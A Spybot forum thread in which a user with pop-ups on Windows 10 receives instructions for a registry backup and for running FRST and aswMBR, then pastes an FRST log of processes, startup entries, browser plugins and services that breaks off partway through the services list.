Malware or Spybot Issue



kym.preston
2016-02-29, 09:49
Hi,
I have an Intel Core i5-4670K at 3.40GHz
16GB of RAM
Running Windows 10 Home edition (64 bit)
Using Avast Antivirus
Chrome Browser

I am working from the infected computer. I am able to access some pages just fine, like Hotmail, the Spybot website and YouTube, but some of my other frequently visited sites all have numerous pop-ups now.

I have run a few full system scans using Spybot - Search and Destroy 2.5 and it has found 5 items with very low to marginal danger ratings. I have selected 'Fix Selected' and the green tick appears, but the pop-ups still seem to persist, and after running more full system scans the same 5 problems come up again. I don't know if this information is redundant or too vague, but the problem types are: registry change (2 of those), Browser: Cache, Registry Key, and Browser History. The categories are Tracks (3 of those) and Browser (2 of those).

I can attach screenshots and whatever else is needed if it helps in diagnosing and solving the problem.

Thanks for any and all help.
--------------------------------
Admin Edit
FAQ: http://forums.spybot.info/showthread.php?t=288

Juliet
2016-02-29, 11:27
Please back up your registry!

Backup the Registry:
Credit: Dakeyras

Modifying the Registry can create unforeseen problems, so it is always wise to create a backup before doing so.


Please download the installer for Registry Backup from here (http://www.bleepingcomputer.com/download/registry-backup/) or here (http://www.tweaking.com/files/setups/tweaking.com_registry_backup_setup.exe) and save to your desktop.
Right-click on tweaking.com_registry_backup_setup.exe and select Run as Administrator >> Follow the prompts for a default installation
Ensure the option Open "Tweaking.com - Registry Backup" When Install Completes is selected >> Next > >> Finish
Once the GUI (graphical user interface) has appeared/loaded:-

http://i280.photobucket.com/albums/kk173/Dakeyras_album2/TCRB-1.jpg


Click on Backup Now >> once the process is complete the below will be displayed in the GUI:-

http://i280.photobucket.com/albums/kk173/Dakeyras_album2/TBRB-2.jpg


Close Tweaking.com - Registry Backup

Note: There will now be a folder at the root of the Hard-Drive named C:\RegBackup, do not delete this as it is the actual backup just created.

A tutorial for Registry Backup explaining the various features can be viewed HERE (http://www.malwareremoval.com/forum/viewtopic.php?f=4&t=61325)


``````````````````````````````````````````````````````

Instructions for producing the Farbar Recovery Scan Tool (FRST) and aswMBR logs

Farbar Log


Please download Farbar Recovery Scan Tool (http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/) and save it to your desktop.

Note:
You need to run the version compatible with your system. If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.

(A simple way to check your system: Start --> Computer (right click) --> Properties)
How to determine whether a computer is running a 32-bit version or 64-bit version (http://support.microsoft.com/kb/827218) of the Windows operating system


Right click to run as administrator (XP users click run after receipt of Windows Security Warning - Open File). When the tool opens click Yes to disclaimer.
Please make sure All Users is checked



Do not check
*List BCD
*Drivers MD5
*Shortcut txt

Or your logs will be too long to post.



Press Scan button.
It will produce a log called FRST.txt in the same directory the tool is run from.
Please don't run the Farbar Recovery Scan Tool (FRST.txt) from your "Downloads" folder or from "Temporary Internet Files"
Please copy and paste log into your topic.
The first time the tool is run it generates another log (Addition.txt - also located in the same directory as FRST.exe/FRST64.exe). Please attach that along with the FRST.txt into your reply.



aswMBR Log

Important! Please do NOT perform any fix options offered in aswMBR, we just need to see the report.

Please download aswMBR (http://public.avast.com/%7Egmerek/aswMBR.exe) to your desktop.



Double click the aswMBR icon to run it.
If a prompt stating: The computer supports "Virtualization Technology" appears select Yes
Click the Scan button to start scan.
If you are asked to update the Avast Virus database please allow it to do so.
When it finishes, press the Save Log button, save the logfile to your desktop and post its contents in your reply with the Farbar (FRST) log.

kym.preston
2016-02-29, 11:55
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:27-02-2016
Ran by Kym (administrator) on KYM-PC (29-02-2016 20:46:10)
Running from C:\Users\Kym\Desktop
Loaded Profiles: Kym (Available Profiles: Kym)
Platform: Windows 10 Home (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\WINDOWS\System32\atiesrxx.exe
(Intel Corporation) C:\WINDOWS\System32\igfxCUIService.exe
(Avast Software s.r.o.) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Microsoft Corporation) C:\WINDOWS\System32\mqsvc.exe
(Razer Inc.) C:\Program Files (x86)\Razer Chroma SDK\bin\RzSDKService.exe
(Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PaperPort\PDFProFiltSrvPP.exe
() C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
(Microsoft Corporation) C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
(Microsoft Corporation) C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Avast Software) C:\Program Files\AVAST Software\Avast\ng\vbox\AvastVBoxSVC.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\ng\ngservice.exe
(Microsoft Corporation) C:\WINDOWS\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Intel Corporation) C:\WINDOWS\System32\igfxEM.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\LCore.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\Applets\LCDMedia.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\Applets\LCDCountdown.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\Applets\LCDClock.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\Applets\LCDPOP3.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\Applets\LCDRSS.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\cnext.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Angus Johnson) D:\Internode\mum.exe
(Spotify Ltd) C:\Users\Kym\AppData\Roaming\Spotify\SpotifyWebHelper.exe
(Acresso Corporation) C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(Avast Software s.r.o.) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(Razer Inc.) C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe
(Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PaperPort\pptd40nt.exe
(Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PDF Viewer Plus\pdfPro5Hook.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\ControlCenter4\BrCtrlCntr.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Browny02\BrYNSvc.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\ControlCenter4\BrCcUxSys.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
() C:\ProgramData\Razer\Synapse\RzStats\RzStats.Manager.exe
(Razer, Inc.) C:\Program Files (x86)\Razer\InGameEngine\32bit\RazerIngameEngine.exe
(Razer, Inc.) C:\Users\Kym\AppData\Local\Razer\InGameEngine\cache\RzStats.Manager\rzcefrenderprocess.exe
(Razer, Inc.) C:\Users\Kym\AppData\Local\Razer\InGameEngine\cache\RzSynapse\rzcefrenderprocess.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
(Adobe Systems Incorporated) D:\Program Files\Adobe\Adobe Premiere Elements 2011\Elements 11 Organizer\PhotoshopElementsFileAgent.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Microsoft Corporation) C:\WINDOWS\System32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\System32\dllhost.exe


==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13885696 2015-06-24] (Realtek Semiconductor)
HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [287592 2013-08-07] (Intel Corporation)
HKLM\...\Run: [IgfxTray] => C:\Windows\system32\igfxtray.exe [396688 2015-07-18] ()
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508240 2015-08-05] (Adobe Systems Incorporated)
HKLM\...\Run: [Launch LCore] => C:\Program Files\Logitech Gaming Software\LCore.exe [14601160 2015-07-02] (Logitech Inc.)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [170256 2015-09-15] (Apple Inc.)
HKLM\...\Run: [StartCN] => C:\Program Files\AMD\CNext\CNext\cnext.exe [4867784 2015-12-04] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [292848 2013-04-26] (Intel Corporation)
HKLM-x32\...\Run: [Logitech G35] => D:\G35.exe
HKLM-x32\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvastUI.exe [5515496 2015-07-02] (Avast Software s.r.o.)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Razer Synapse] => C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe [591512 2015-11-19] (Razer Inc.)
HKLM-x32\...\Run: [QuickTime Task] => D:\QuickTime\QTTask.exe [421888 2014-10-02] (Apple Inc.)
HKLM-x32\...\Run: [IndexSearch] => C:\Program Files (x86)\Nuance\PaperPort\IndexSearch.exe [46952 2011-08-02] (Nuance Communications, Inc.)
HKLM-x32\...\Run: [PaperPort PTD] => C:\Program Files (x86)\Nuance\PaperPort\pptd40nt.exe [30568 2011-08-02] (Nuance Communications, Inc.)
HKLM-x32\...\Run: [PDFHook] => C:\Program Files (x86)\Nuance\PDF Viewer Plus\pdfpro5hook.exe [636192 2010-03-05] (Nuance Communications, Inc.)
HKLM-x32\...\Run: [PDF5 Registry Controller] => C:\Program Files (x86)\Nuance\PDF Viewer Plus\RegistryController.exe [62752 2010-03-05] (Nuance Communications, Inc.)
HKLM-x32\...\Run: [ControlCenter4] => C:\Program Files (x86)\ControlCenter4\BrCcBoot.exe [139776 2014-06-16] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [BrStsMon00] => C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe [3076096 2012-06-06] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [LogMeIn Hamachi Ui] => "D:\LogMeIn\hamachi-2-ui.exe" --auto-start
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [595504 2016-01-29] (Oracle Corporation)
HKLM-x32\...\Run: [SDTray] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe [4127488 2015-06-16] (Safer-Networking Ltd.)
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Run: [Steam] => D:\Steam\steam.exe [3014224 2016-02-05] (Valve Corporation)
HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Run: [InternodeUsage] => D:\Internode\mum.exe [2242560 2014-12-04] (Angus Johnson)
HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Run: [Spotify Web Helper] => C:\Users\Kym\AppData\Roaming\Spotify\SpotifyWebHelper.exe [2355312 2016-02-19] (Spotify Ltd)
HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Run: [ISUSPM] => C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe [222496 2009-05-05] (Acresso Corporation)
HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Run: [f.lux] => C:\Users\Kym\AppData\Local\FluxSoftware\Flux\flux.exe [1017224 2013-10-24] (Flux Software LLC)
HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Run: [SpybotPostWindows10UpgradeReInstall] => C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe [1011200 2015-07-28] (Safer-Networking Ltd.)
ShellIconOverlayIdentifiers: [ GoogleDriveBlacklisted] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2016-01-15] (Google)
ShellIconOverlayIdentifiers: [ GoogleDriveSynced] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2016-01-15] (Google)
ShellIconOverlayIdentifiers: [ GoogleDriveSyncing] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2016-01-15] (Google)
ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
ShellIconOverlayIdentifiers: [ SkyDrivePro1 (ErrorConflict)] -> {8BA85C75-763B-4103-94EB-9470F12FE0F7} => D:\Microsoft Office 2013\Office15\GROOVEEX.DLL [2016-01-12] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [ SkyDrivePro2 (SyncInProgress)] -> {CD55129A-B1A1-438E-A425-CEBC7DC684EE} => D:\Microsoft Office 2013\Office15\GROOVEEX.DLL [2016-01-12] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [ SkyDrivePro3 (InSync)] -> {E768CD3B-BDDC-436D-9C13-E1B39CA257B1} => D:\Microsoft Office 2013\Office15\GROOVEEX.DLL [2016-01-12] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2015-07-02] (Avast Software s.r.o.)
ShellIconOverlayIdentifiers: [GDriveSharedOverlay] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43} => No File
ShellIconOverlayIdentifiers-x32: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
ShellIconOverlayIdentifiers-x32: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
ShellIconOverlayIdentifiers-x32: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
ShellIconOverlayIdentifiers-x32: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
ShellIconOverlayIdentifiers-x32: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
Startup: C:\Users\Kym\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Open Broadcaster Software (32bit) (2).lnk [2015-08-20]
ShortcutTarget: Open Broadcaster Software (32bit) (2).lnk -> C:\Program Files (x86)\OBS\OBS.exe ()
BootExecute: autocheck autochk * sdnclean64.exe

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\Parameters: [NameServer] 82.163.143.171 82.163.142.173
Tcpip\..\Interfaces\{127aa56b-0275-418a-8714-77c67b9692aa}: [NameServer] 82.163.143.171 82.163.142.173
Tcpip\..\Interfaces\{127aa56b-0275-418a-8714-77c67b9692aa}: [DhcpNameServer] 192.168.1.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
SearchScopes: HKLM -> DefaultScope value is missing
SearchScopes: HKLM-x32 -> DefaultScope value is missing
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> D:\Microsoft Office 2013\Office15\OCHelper.dll [2016-01-12] (Microsoft Corporation)
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2015-07-02] (Avast Software s.r.o.)
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> D:\Microsoft Office 2013\Office15\GROOVEEX.DLL [2016-01-12] (Microsoft Corporation)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office15\OCHelper.dll [2016-01-12] (Microsoft Corporation)
BHO-x32: PlusIEEventHelper Class -> {551A852F-39A6-44A7-9C13-AFBEC9185A9D} -> C:\Program Files (x86)\Nuance\PDF Viewer Plus\Bin\PlusIEContextMenu.dll [2009-02-06] (Zeon Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_74\bin\ssv.dll [2016-02-25] (Oracle Corporation)
BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2015-07-02] (Avast Software s.r.o.)
BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)
BHO-x32: No Name -> {c4e7ab80-82fd-49d4-801d-669cc0a2392a} -> No File
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office15\GROOVEEX.DLL [2016-01-12] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_74\bin\jp2ssv.dll [2016-02-25] (Oracle Corporation)
Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - D:\Microsoft Office 2013\Office15\MSOSB.DLL [2015-02-17] (Microsoft Corporation)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2014-05-02] (Skype Technologies)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)

FireFox:
========
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> D:\MICROS~1\Office15\NPSPWRAP.DLL [2014-01-23] (Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [2014-04-28] (Adobe Systems)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2014-10-30] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [No File]
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [No File]
FF Plugin-x32: @java.com/DTPlugin,version=11.74.2 -> C:\Program Files (x86)\Java\jre1.8.0_74\bin\dtplugin\npDeployJava1.dll [2016-02-25] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.74.2 -> C:\Program Files (x86)\Java\jre1.8.0_74\bin\plugin2\npjp2.dll [2016-02-25] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2015-11-18] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office15\NPSPWRAP.DLL [2014-01-22] (Microsoft Corporation)
FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll [No File]
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> D:\VLC\npvlc.dll [2015-04-13] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> D:\VLC\npvlc.dll [2015-04-13] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2015-12-19] (Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll [2014-04-28] (Adobe Systems)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npMeetingJoinPluginOC.dll [2015-11-18] (Microsoft Corporation)
FF HKLM-x32\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF Extension: Avast Online Security - C:\Program Files\AVAST Software\Avast\WebRep\FF [2015-12-10]

Chrome:
=======
CHR HomePage: Default -> hxxp://www.google.com/
CHR StartupUrls: Default -> "hxxp://www.youtube.com/feed/subscriptions","hxxp://imgur.com/","hxxps://www.netflix.com/","hxxp://twitch.tv/"
CHR Plugin: (Shockwave Flash) - C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\PepperFlash\pepflashplayer.dll ()
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\ppGoogleNaClPluginChrome.dll => No File
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\pdf.dll => No File
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.115\npGoogleUpdate3.dll => No File
CHR Plugin: (Intel® Identity Protection Technology) - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll => No File
CHR Plugin: (Intel® Identity Protection Technology) - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll => No File
CHR Plugin: (Java(TM) Platform SE 7 U55) - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll => No File
CHR Profile: C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (YouTube) - C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-24]
CHR Extension: (Adblock Plus) - C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2016-02-26]
CHR Extension: (Google Search) - C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-27]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-07-26]
CHR Extension: (Gmail) - C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-03-28]
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx [2015-07-02]
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2016-01-08]

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AdobeActiveFileMonitor11.0; D:\Program Files\Adobe\Adobe Premiere Elements 2011\Elements 11 Organizer\PhotoshopElementsFileAgent.exe [171600 2012-09-17] (Adobe Systems Incorporated)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2020056 2016-02-09] (Adobe Systems, Incorporated)
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [77104 2015-09-02] (Apple Inc.)
S3 AppleChargerSrv; C:\Windows\System32\AppleChargerSrv.exe [31272 2010-04-07] ()
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [343336 2015-07-02] (Avast Software s.r.o.)
R3 AvastVBoxSvc; C:\Program Files\AVAST Software\Avast\ng\vbox\AvastVBoxSVC.exe [4034896 2015-07-02] (Avast Software)
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [49152 2014-05-04] () [File not signed]
R3 BrYNSvc; C:\Program Files (x86)\Browny02\BrYNSvc.exe [266240 2012-06-05] (Brother Industries, Ltd.) [File not signed]
R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2016-01-08] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2016-01-08] (Microsoft Corporation)
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [15720 2013-08-07] (Intel Corporation)
